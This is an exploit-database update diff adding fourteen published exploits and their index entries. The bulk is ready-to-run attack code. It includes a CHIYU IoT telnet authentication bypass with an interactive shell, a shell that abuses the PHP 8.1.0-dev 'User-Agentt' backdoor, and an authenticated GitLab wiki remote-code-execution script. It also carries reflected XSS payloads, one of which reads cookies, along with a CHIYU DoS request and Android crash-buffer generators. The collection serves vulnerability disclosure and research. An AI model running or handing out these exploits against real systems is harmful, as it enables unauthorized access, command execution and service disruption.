DB: 2021-06-04

14 changes to exploits/shellcodes

BasicNote 1.1.9 - Denial of Service (PoC)
ColorNote 4.1.9 - Denial of Service (PoC)
Notepad notes 2.6.7 - Denial of Service (PoC)
Blacknote 2.2.1 - Denial of Service (PoC)

CHIYU IoT Devices - 'Telnet' Authentication Bypass
PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
Seo Panel 4.8.0 - 'from_time' Reflected XSS
CHIYU IoT Devices - Denial of Service (DoS)
FUDForum 3.1.0 - 'srch' Reflected XSS
FUDForum 3.1.0 - 'author' Reflected XSS
Gitlab 13.9.3 - Remote Code Execution (Authenticated)
4Images 1.8 - 'redirect' Reflected XSS

exploits/android/dos/49938.py

@@ -0,0 +1,35 @@
+# Exploit Title: BasicNote 1.1.9 - Denial of Service (PoC)
+# Date: 2021-06-02
+# Author: Brian Rodríguez
+# Download Link: https://play.google.com/store/apps/details?id=notizen.basic.notes.notas.note.notepad&hl=es_MX
+# Version: 1.1.9
+# Category: DoS (Android)
+
+##### Vulnerability #####
+
+BasicNote - Notas, Bloc de notas is vulnerable to a DoS condition when two long lists of characters are being used when creating a note:
+
+# STEPS #
+# Open the program
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt twice in the new Note.
+# Crashed
+
+Successful exploitation will causes application stop working.
+
+I have been able to test this exploit against Android 8.0.
+
+##### PoC #####
+
+#!/usr/bin/env python
+buffer = "\x41" * 350000
+
+try:
+    f = open("payload.txt","w")
+    f.write(buffer)
+    f.close()
+    print ("File created")
+except:
+    print ("File cannot be created")

exploits/android/dos/49939.py

@@ -0,0 +1,37 @@
+# Exploit Title: ColorNote 4.1.9 - Denial of Service (PoC)
+# Date: 2021-06-02
+# Author: Brian Rodríguez
+# Download Link: https://play.google.com/store/apps/details?id=com.socialnmobile.dictapps.notepad.color.note&hl=es_MX
+# Version: 4.1.9
+# Category: DoS (Android)
+
+##### Vulnerability #####
+
+Color Note is vulnerable to a DoS condition when a long list of characters is being used.
+
+# STEPS #
+# Open the program
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt in the new note.
+# Click the "Return" button twice.
+# Start clicking the screen.
+# Crashed
+
+Successful exploitation will causes application stop working.
+
+I have been able to test this exploit against Android 8.0.
+
+##### PoC #####
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 350000
+
+try:
+    f = open("payload.txt","w")
+    f.write(buffer)
+    f.close()
+    print ("File created")
+except:
+    print ("File cannot be created")

exploits/android/dos/49940.py

@@ -0,0 +1,35 @@
+# Exploit Title: Notepad notes 2.6.7 - Denial of Service (PoC)
+# Date: 2021-06-02
+# Author: Brian Rodríguez
+# Download Link: https://play.google.com/store/apps/details?id=com.hlcsdev.x.notepad&hl=es_MX
+# Version: 2.6.7
+# Category: DoS (Android)
+
+##### Vulnerability #####
+
+Bloc de notas is vulnerable to a DoS condition when a long lists of characters is being used when creating a note:
+
+# STEPS #
+# Open the program.
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt twice in the new Note.
+# Crashed
+
+Successful exploitation will cause application to stop working.
+
+I have been able to test this exploit against Android 8.0.
+
+##### PoC #####
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 350000
+
+try:
+    f = open("payload.txt","w")
+    f.write(buffer)
+    f.close()
+    print ("File created")
+except:
+    print ("File cannot be created")

exploits/android/dos/49941.py

@@ -0,0 +1,35 @@
+# Exploit Title: Blacknote 2.2.1 - Denial of Service (PoC)
+# Date: 2021-06-02
+# Author: Brian Rodríguez
+# Download Link: https://play.google.com/store/apps/details?id=notepad.note.notas.notes.notizen&hl=es_MX
+# Version: 2.2.1
+# Category: DoS (Android)
+
+##### Vulnerability #####
+
+BlackNote Bloc de notas is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
+
+# STEPS #
+# Open the program.
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt twice in the new Note.
+# Crashed
+
+Successful exploitation will cause the application to stop working.
+
+I have been able to test this exploit against Android 8.0.
+
+##### PoC #####
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 350000
+
+try:
+    f = open("payload.txt","w")
+    f.write(buffer)
+    f.close()
+    print ("File created")
+except:
+    print ("File cannot be created")

exploits/hardware/remote/49936.py

@@ -0,0 +1,81 @@
+# Exploit Title: CHIYU IoT Devices - 'Telnet' Authentication Bypass
+# Date: 01/06/2021
+# Exploit Author: sirpedrotavares
+# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
+# Software Link: https://www.chiyu-tech.com/category-hardware.html
+# Version:  BF-430, BF-431, BF-450M, and SEMAC   - all firmware versions < June 2021
+# Tested on:  BF-430, BF-431, BF-450M, and SEMAC
+# CVE: CVE-2021-31251
+# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks
+
+"""
+Description: Several IoT devices from the CHIYU Technology firm are
+vulnerable to a flaw that permits bypassing the telnet authentication
+process due to an overflow during the negotiation of the telnet protocol.
+Telnet authentication is bypassed by supplying a specially malformed
+request, and an attacker may force the remote telnet server to believe that
+the user has already authenticated. Several models are vulnerable,
+including BF-430, BF-431, BF-450M, and SEMAC with the most recent firmware
+versions.
+CVE ID: CVE-2021-31251
+CVSS: Critical - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31251
+"""
+
+#!/usr/bin/env python3
+
+# usage: python3 exploit.py IP
+
+import socket
+import time
+import sys
+
+HOST = sys.argv[1]
+PORT = 23
+
+socket.setdefaulttimeout(10)
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+try:
+    connect = s.connect_ex((HOST, PORT))
+    try:
+        print("[+] Try to connect...\n")
+        time.sleep(1)
+        s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
+        s.recv(1024).strip()
+        s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
+        s.recv(1024).strip()
+        s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
+        result = s.recv(1024).strip()
+        if result != b'\xff\xfe\x01':
+            s.send(b"\x09")
+            result = s.recv(1024).strip()
+
+        if connect == 0 and "sername" not in str(result):
+            if b"\xff\xfe\x01" == result:
+                print("Connected! ;)\ntype: \"help\"\n\n")
+                while 1:
+                        cmd = input("(CHIYU pwnShell:) $ ")
+                        body = cmd+"\n"
+                        s.send(body.encode('utf-8', 'ignore'))
+                        result = s.recv(1024).decode('utf8', 'ignore')
+
+                        if not len(result):
+                            print("[+] CHIYU device not available, try
+again ... (terminating)")
+                            s.close()
+                            break
+                        print(result.strip('CMD>'))
+                        b = "\n"
+                        s.send(b.encode('utf-8', 'ignore'))
+                        result = s.recv(1024).decode()
+                        print(result.strip('CMD>'))
+    except KeyboardInterrupt:
+        print("\n[+] ^C Received, closing connection")
+        s.close()
+    except EOFError:
+        print("\n[+] ^D Received, closing connection")
+        s.close()
+
+except socket.error:
+    print("[+] Unable to connect to CHIYU device.")

exploits/hardware/webapps/49937.txt

@@ -0,0 +1,47 @@
+# Exploit Title: CHIYU IoT Devices - Denial of Service (DoS)
+# Date: 01/06/2021
+# Exploit Author: sirpedrotavares
+# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
+# Software Link: https://www.chiyu-tech.com/category-hardware.html
+# Version: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC   - all firmware versions < June 2021
+# Tested on: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC
+# CVE: CVE-2021-31642
+# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks
+
+Description: A denial of service condition exists after an integer overflow in several IoT devices from CHIYU Technology, including BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC. The vulnerability can be explored by sending an unexpected integer (> 32 bits) on the page parameter that will crash the web portal and making it unavailable until a reboot of the device.
+CVE ID: CVE-2021-31642
+CVSS: Medium- CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
+URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31642
+
+Affected parameter: page=Component: if.cgi
+Payload:
+if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000
+
+====HTTP request======
+GET
+/if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000
+HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
+Gecko/20100101 Firefox/87.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
+Accept-Encoding: gzip, deflate
+Authorization: Basic YWRtaW46YWRtaW4=
+Connection: close
+Referer: http://127.0.0.1/AccLog.htm
+Cookie: fresh=
+Upgrade-Insecure-Requests: 1
+
+
+
+Steps to reproduce:
+  1. Navigate to the vulnerable device
+  2. Make a GET request to the CGI component (if.cgi)
+  3. Append the payload at the end of the vulnerable parameter (page)
+  4. Submit the request and observe payload execution
+
+
+ Mitigation: The latest version of the CHIYU firmware should be installed
+to mitigate this vulnerability.

exploits/multiple/webapps/49163.txt

@@ -5,6 +5,7 @@
 # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lssems.zip
 # Version: 1.0
 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+# CVE: CVE-2021-3278
 
 Step 1: Open the URL http://localhost:8080/lssems/admin/login.php
 Step 2: use payload Aditya' or 1=1# in user and password field

exploits/multiple/webapps/49884.txt

@@ -4,6 +4,7 @@
 # Vendor Homepage: https://www.in4velocity.com/in4suite-erp.html
 # Version: In4Suite ERP 3.2.74.1370
 # Tested on: Windows
+# CVE: CVE-2021-27828
 
 -----------------------------------------
 

exploits/php/webapps/49933.py

@@ -0,0 +1,53 @@
+# Exploit Title: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
+# Date: 23 may 2021
+# Exploit Author: flast101
+# Vendor Homepage: https://www.php.net/
+# Software Link: 
+#     - https://hub.docker.com/r/phpdaily/php
+#    - https://github.com/phpdaily/php
+# Version: 8.1.0-dev
+# Tested on: Ubuntu 20.04
+# References:
+#    - https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
+#   - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md
+
+"""
+Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
+Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/backdoor_php_8.1.0-dev.py
+Contact: flast101.sec@gmail.com
+
+An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.
+The following exploit uses the backdoor to provide a pseudo shell ont the host.
+"""
+
+#!/usr/bin/env python3
+import os
+import re
+import requests
+
+host = input("Enter the full host url:\n")
+request = requests.Session()
+response = request.get(host)
+
+if str(response) == '<Response [200]>':
+    print("\nInteractive shell is opened on", host, "\nCan't acces tty; job crontol turned off.")
+    try:
+        while 1:
+            cmd = input("$ ")
+            headers = {
+            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
+            "User-Agentt": "zerodiumsystem('" + cmd + "');"
+            }
+            response = request.get(host, headers = headers, allow_redirects = False)
+            current_page = response.text
+            stdout = current_page.split('<!DOCTYPE html>',1)
+            text = print(stdout[0])
+    except KeyboardInterrupt:
+        print("Exiting...")
+        exit
+
+else:
+    print("\r")
+    print(response)
+    print("Host is not available, aborting...")
+    exit

exploits/php/webapps/49935.txt

@@ -0,0 +1,19 @@
+# Exploit Title: Seo Panel 4.8.0 - 'from_time' Reflected XSS
+# Date: 23-03-2021
+# Exploit Author: Piyush Patil
+# Vendor Homepage: https://www.seopanel.org/
+# Version: Seo Panel 4.8.0
+# Tested on: Windows 10 and Kali
+# CVE : CVE-2021-28420
+
+-Description:
+A cross-site scripting (XSS) issue in Seo Panel 4.8.0 allows remote
+attackers to inject JavaScript via alerts.php and the "from_time" parameter.
+
+-Payload used:
+x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22
+
+-Steps to reproduce:
+1- Login to SEO admin panel
+2- Visit: http://localhost/alerts.php?alert_category=general&from_time=x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22&keyword=&to_time=2021-03-11
+3- Hover your mouse to "Period" field

exploits/php/webapps/49942.txt

@@ -0,0 +1,19 @@
+# Exploit Title: FUDForum 3.1.0 - 'srch' Reflected XSS
+# Exploit Author: Piyush Patil
+# Vendor Homepage: http://fudforum.org/
+# Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum_3.1.0.zip/download
+# Version: FUDForum 3.1.0
+# Tested on: Windows 10 and Kali
+# CVE : CVE-2021-27519
+
+-Description:
+A cross-site scripting (XSS) issue in FUDForum 3.1.0 allows remote attackers to inject JavaScript via index.php in the "srch" parameter.
+
+
+-Payload used:
+x" onmouseover=alert(1) x="
+
+-Steps to reproduce:
+1- goto https://localhost/fudforum/index.php?t=search&
+2- In "forum search" option, paste XSS payload
+3- Hover your mouse to "x" and XSS will get triggered

exploits/php/webapps/49943.txt

@@ -0,0 +1,19 @@
+# Exploit Title: FUDForum 3.1.0 - 'author' Reflected XSS
+# Exploit Author: Piyush Patil
+# Vendor Homepage: http://fudforum.org/
+# Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum_3.1.0.zip/download
+# Version: FUDForum 3.1.0
+# Tested on: Windows 10 and Kali
+# CVE : CVE-2021-27520
+
+-Description:
+A cross-site scripting (XSS) issue in FUDForum 3.1.0 allows remote attackers to inject JavaScript via index.php in the "author" parameter.
+
+
+-Payload used:
+y" onmouseover=alert(2) y="
+
+-Steps to reproduce:
+1- goto https://localhost/fudforum/index.php?t=search&
+2- In the "Filter by User" search option, paste XSS payload
+3- Hover your mouse to "y" and XSS will get triggered

exploits/php/webapps/49945.txt

@@ -0,0 +1,17 @@
+# Exploit Title: 4Images 1.8 - 'redirect' Reflected XSS
+# Exploit Author: Piyush Patil
+# Vendor Homepage: https://www.4homepages.de/
+# Software Link: https://www.4homepages.de/?download=4images1.8.zip&code=81da0c7b5208e172ea83d879634f51d6
+# Version: 4Images Gallery 1.8
+# Tested on: Windows 10 and Kali
+# CVE : CVE-2021-27308
+
+-Description:
+A cross-site scripting (XSS) vulnerability in the admin login panel in 4images version 1.8 allows remote attackers to inject JavaScript via the "redirect" parameter.
+
+
+-Steps to reproduce:
+1- Goto 4images admin panel page (demo instance: https://localhost/4images/admin/index.php)
+2- Enter the credentials , Turn on the intercept and click on "Login"
+3- copy paste the XSS payload after redirect=./../admin/index.php%3Fsessionid=xxxxxPASTEPAYLOADHERE
+4-Forward the request and you can see XSS is triggered.

exploits/ruby/webapps/49944.py

@@ -0,0 +1,110 @@
+# Exploit Title: Gitlab 13.9.3 - Remote Code Execution (Authenticated)
+# Date: 02/06/2021
+# Exploit Author: enox
+# Vendor Homepage: https://about.gitlab.com/
+# Software Link: https://gitlab.com/
+# Version: < 13.9.4
+# Tested On: Ubuntu 20.04
+# Environment: Gitlab 13.9.1 CE
+# Credits: https://hackerone.com/reports/1125425
+
+#!/usr/bin/python3
+
+import requests
+from bs4 import BeautifulSoup
+import random
+import os
+import argparse
+
+parser = argparse.ArgumentParser(description='GitLab < 13.9.4 RCE')
+parser.add_argument('-u', help='Username', required=True)
+parser.add_argument('-p', help='Password', required=True)
+parser.add_argument('-c', help='Command', required=True)
+parser.add_argument('-t', help='URL (Eg: http://gitlab.example.com)', required=True)
+args = parser.parse_args()
+
+username = args.u
+password = args.p
+gitlab_url = args.t
+command = args.c
+
+session = requests.Session()
+
+# Authenticating
+print("[1] Authenticating")
+r = session.get(gitlab_url + "/users/sign_in")
+soup = BeautifulSoup(r.text, features="lxml")
+token = soup.findAll('meta')[16].get("content")
+
+login_form = {
+    "authenticity_token": token,
+    "user[login]": username,
+    "user[password]": password,
+    "user[remember_me]": "0"
+}
+r = session.post(f"{gitlab_url}/users/sign_in", data=login_form)
+
+if r.status_code != 200:
+    exit(f"Login Failed:{r.text}")
+else:
+    print("Successfully Authenticated")
+
+# Creating Project
+print("[2] Creating Project")
+r = session.get(f"{gitlab_url}/projects/new")
+soup = BeautifulSoup(r.text, features="lxml")
+
+project_token = soup.findAll('meta')[16].get("content")
+project_token = project_token.replace("==", "%3D%3D")
+project_token = project_token.replace("+", "%2B")
+project_name = f'project{random.randrange(1, 10000)}'
+cookies = {'sidebar_collapsed': 'false','event_filter': 'all','hide_auto_devops_implicitly_enabled_banner_1': 'false','_gitlab_session': session.cookies['_gitlab_session'],}
+
+payload=f"utf8=%E2%9C%93&authenticity_token={project_token}&project%5Bci_cd_only%5D=false&project%5Bname%5D={project_name}&project%5Bpath%5D={project_name}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=20"
+
+r = session.post(gitlab_url+'/projects', data=payload, cookies=cookies, verify=False)
+
+if "The change you requested was rejected." in r.text:
+    exit('Exploit failed, check input params')
+else:
+    print("Successfully created project")
+
+
+# Cloning Wiki and Writing Files
+print("[3] Pushing files to the project wiki")
+wiki_url = f'{gitlab_url}/{username}/{project_name}.wiki.git'
+os.system(f"git clone {wiki_url} /tmp/project")
+
+f1 = open("/tmp/project/load1.rmd","w")
+f1.write('{::options syntax_highlighter="rouge" syntax_highlighter_opts="{formatter: Redis, driver: ../get_process_mem\}" /}\n\n')
+f1.write('~~~ ruby\n')
+f1.write('    def what?\n')
+f1.write('      42\n')
+f1.write('    end\n')
+f1.write('~~~\n')
+f1.close()
+
+f2 = open("/tmp/project/load2.rmd","w")
+temp='{::options syntax_highlighter="rouge" syntax_highlighter_opts="{a: \'`'+command+'`\', formatter: GetProcessMem\}" /}\n\n'
+f2.write(temp)
+f2.write('~~~ ruby\n')
+f2.write('    def what?\n')
+f2.write('      42\n')
+f2.write('    end\n')
+f2.write('~~~\n')
+f2.close()
+
+# It will prompt for user and pass. Enter it.
+os.system('cd /tmp/project && git add -A . && git commit -m "Commit69" && git push')
+
+print("Succesfully Pushed")
+
+# Cleaning Up
+os.system('rm -rf /tmp/project')
+
+# Triggering RCE
+
+print("[4] Triggering RCE")
+trigger_url=f"{gitlab_url}/{username}/{project_name}/-/wikis/load2"
+
+r = session.get(trigger_url, cookies=cookies, verify=False)

files_exploits.csv

@@ -6785,6 +6785,10 @@ id,file,description,date,author,type,platform,port
 49898,exploits/windows/dos/49898.txt,"iDailyDiary 4.30 - Denial of Service (PoC)",2021-05-24,"Ismael Nava",dos,windows,
 49906,exploits/windows/dos/49906.py,"RarmaRadio 2.72.8 - Denial of Service (PoC)",2021-05-26,"Ismael Nava",dos,windows,
 49917,exploits/windows/dos/49917.py,"DupTerminator 1.4.5639.37199 - Denial of Service (PoC)",2021-06-01,"Brian Rodriguez",dos,windows,
+49938,exploits/android/dos/49938.py,"BasicNote 1.1.9 - Denial of Service (PoC)",2021-06-03,"Brian Rodriguez",dos,android,
+49939,exploits/android/dos/49939.py,"ColorNote 4.1.9 - Denial of Service (PoC)",2021-06-03,"Brian Rodriguez",dos,android,
+49940,exploits/android/dos/49940.py,"Notepad notes 2.6.7 - Denial of Service (PoC)",2021-06-03,"Brian Rodriguez",dos,android,
+49941,exploits/android/dos/49941.py,"Blacknote 2.2.1 - Denial of Service (PoC)",2021-06-03,"Brian Rodriguez",dos,android,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -18475,6 +18479,7 @@ id,file,description,date,author,type,platform,port
 49815,exploits/linux/remote/49815.py,"GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution (2)",2021-04-30,liewehacksie,remote,linux,
 49896,exploits/solaris/remote/49896.py,"Solaris SunSSH 11.0 x86 - libpam Remote Root (2)",2021-05-21,legend,remote,solaris,
 49908,exploits/linux/remote/49908.py,"ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)",2021-05-26,Shellbr3ak,remote,linux,
+49936,exploits/hardware/remote/49936.py,"CHIYU IoT Devices - 'Telnet' Authentication Bypass",2021-06-03,sirpedrotavares,remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -44095,3 +44100,10 @@ id,file,description,date,author,type,platform,port
 49930,exploits/python/webapps/49930.txt,"Products.PluggableAuthService 2.6.0 - Open Redirect",2021-06-02,"Piyush Patil",webapps,python,
 49931,exploits/php/webapps/49931.txt,"Seo Panel 4.8.0 - 'search_name' Reflected XSS",2021-06-02,"Piyush Patil",webapps,php,
 49932,exploits/php/webapps/49932.txt,"Seo Panel 4.8.0 - 'category' Reflected XSS",2021-06-02,"Piyush Patil",webapps,php,
+49933,exploits/php/webapps/49933.py,"PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution",2021-06-03,flast101,webapps,php,
+49935,exploits/php/webapps/49935.txt,"Seo Panel 4.8.0 - 'from_time' Reflected XSS",2021-06-03,"Piyush Patil",webapps,php,
+49937,exploits/hardware/webapps/49937.txt,"CHIYU IoT Devices - Denial of Service (DoS)",2021-06-03,sirpedrotavares,webapps,hardware,
+49942,exploits/php/webapps/49942.txt,"FUDForum 3.1.0 - 'srch' Reflected XSS",2021-06-03,"Piyush Patil",webapps,php,
+49943,exploits/php/webapps/49943.txt,"FUDForum 3.1.0 - 'author' Reflected XSS",2021-06-03,"Piyush Patil",webapps,php,
+49944,exploits/ruby/webapps/49944.py,"Gitlab 13.9.3 - Remote Code Execution (Authenticated)",2021-06-03,enox,webapps,ruby,
+49945,exploits/php/webapps/49945.txt,"4Images 1.8 - 'redirect' Reflected XSS",2021-06-03,"Piyush Patil",webapps,php,